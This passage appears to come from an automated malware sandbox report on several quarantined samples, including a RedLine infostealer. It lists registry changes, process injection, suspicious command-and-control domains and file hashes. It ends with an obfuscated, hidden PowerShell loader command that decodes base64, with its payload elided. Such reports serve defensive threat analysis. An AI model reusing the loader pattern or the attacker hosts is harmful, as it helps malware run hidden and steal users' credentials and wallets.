Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000500ec1bad367ae4b9a7b7ef006acb24f0000000002000000000010660000000100002000000029f2d9948d998697d9e0b74acdf52009f6bb037f9cce3039a0580902469dc730000000000e8000000002000020000000d0dc09fdc8344193bf2bb0d6fb37e7aeec423041169ea85f66a607fc5fd8b33f2000000068eed23f5015d4ec9bc4ec1c235ed49b36dbe643308398dfb53ea2812549108840000000c27f205c09b23cc7cf372198d90f0f4a13fa9930cbd941d480a3a10c4c6856ae26e141b07b87456d38f248ddb10f39af40a237d3a8736be535ca82206d92c216 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D50EF451-F49B-11EF-B20A-C60424AAF5E1} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE1F9.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\TarE27D.tmp


Analysis: behavioral28

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2552 wrote to memory of 4524 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 312 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc6d46f8,0x7ff9cc6d4708,0x7ff9cc6d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_2552_ZYJYCGDISTQDBLFM

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


Analysis: behavioral30

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 45.155.103.183:1488 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 104.115.34.42:80 www.microsoft.com tcp

Files


Analysis: behavioral22

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241023-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2076 set thread context of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 500

Network

Country Destination Domain Proto
US 8.8.8.8:53 fearleszsjourney.tech udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp

Files

memory/2076-0-0x00000000741DE000-0x00000000741DF000-memory.dmp

memory/2076-1-0x0000000000AF0000-0x0000000000B4A000-memory.dmp

memory/2072-3-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-9-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-13-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2072-11-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-17-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-7-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-5-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-16-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2076-18-0x00000000741D0000-0x00000000748BE000-memory.dmp

memory/2072-19-0x0000000000400000-0x000000000045D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar545E.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2072-57-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2076-58-0x00000000741D0000-0x00000000748BE000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

127s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1404 set thread context of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\SYSTEM32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 3236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 3236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 912 wrote to memory of 3456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 912 wrote to memory of 3456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 1404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 1404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c 67bcef97a5ffe.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '…';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec

